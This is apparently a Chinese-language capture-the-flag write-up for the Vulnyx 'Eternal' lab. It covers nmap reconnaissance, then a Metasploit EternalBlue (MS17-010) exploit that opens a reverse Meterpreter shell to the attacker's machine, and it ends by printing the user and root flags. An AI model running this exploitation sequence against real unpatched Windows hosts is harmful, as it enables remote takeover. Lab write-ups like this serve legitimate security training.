Vulnyx-Eternal

难度:easy

kali:192.168.56.104

靶机:192.168.56.200

> arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
192.168.56.100  08:00:27:a5:47:e3       PCS Systemtechnik GmbH
192.168.56.200  08:00:27:1b:02:dc       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.941 seconds (131.89 hosts/sec). 3 responded

端口扫描

> nmap -sS -sV -A -p- -T4 192.168.56.200
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-17 20:36 CST
Nmap scan report for 192.168.56.200
Host is up (0.00031s latency).
Not shown: 65525 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Enterprise 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 08:00:27:1B:02:DC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: MIKE-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-07-17T19:10:22
|_  start_date: 2024-07-17T18:22:11
|_clock-skew: mean: 5h52m39s, deviation: 1h09m16s, median: 6h32m38s
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: MIKE-PC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:1b:02:dc (Oracle VirtualBox virtual NIC)
| smb-os-discovery: 
|   OS: Windows 7 Enterprise 7601 Service Pack 1 (Windows 7 Enterprise 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: MIKE-PC
|   NetBIOS computer name: MIKE-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-07-17T21:10:22+02:00

TRACEROUTE
HOP RTT     ADDRESS
1   0.31 ms 192.168.56.200

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.00 seconds

是一个win7的系统，有SMB服务,没有Kerberos

漏洞扫描

> nmap --script vuln -p445 192.168.56.200
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-17 20:47 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.56.200
Host is up (0.00030s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 08:00:27:1B:02:DC (Oracle VirtualBox virtual NIC)

Host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 39.29 seconds

又是ms17-010

MS17-010

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.56.200
rhost => 192.168.56.200
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.56.104
lhost => 192.168.56.104
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.56.104:4444 
[*] 192.168.56.200:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.56.200:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.56.200:445    - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.56.200:445 - The target is vulnerable.
[*] 192.168.56.200:445 - Connecting to target for exploitation.
[+] 192.168.56.200:445 - Connection established for exploitation.
[+] 192.168.56.200:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.56.200:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.56.200:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70  Windows 7 Enterp
[*] 192.168.56.200:445 - 0x00000010  72 69 73 65 20 37 36 30 31 20 53 65 72 76 69 63  rise 7601 Servic
[*] 192.168.56.200:445 - 0x00000020  65 20 50 61 63 6b 20 31                          e Pack 1        
[+] 192.168.56.200:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.56.200:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.56.200:445 - Sending all but last fragment of exploit packet
[*] 192.168.56.200:445 - Starting non-paged pool grooming
[+] 192.168.56.200:445 - Sending SMBv2 buffers
[+] 192.168.56.200:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.56.200:445 - Sending final SMBv2 buffers.
[*] 192.168.56.200:445 - Sending last fragment of exploit packet!
[*] 192.168.56.200:445 - Receiving response from exploit packet
[+] 192.168.56.200:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.56.200:445 - Sending egg to corrupted connection.
[*] 192.168.56.200:445 - Triggering free of corrupted buffer.
[*] Sending stage (201798 bytes) to 192.168.56.200
[*] Meterpreter session 1 opened (192.168.56.104:4444 -> 192.168.56.200:49178) at 2024-07-17 20:49:59 +0800
[+] 192.168.56.200:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.56.200:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.56.200:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > 

C:\Users\MIKE\Desktop>type user.txt
type user.txt
c4fa8bfbc9855acfced6a56a7da3156e 

C:\Users\MIKE\Desktop>type root*
type root*

root.txt


1682c7160e3855a6685316efb97ce451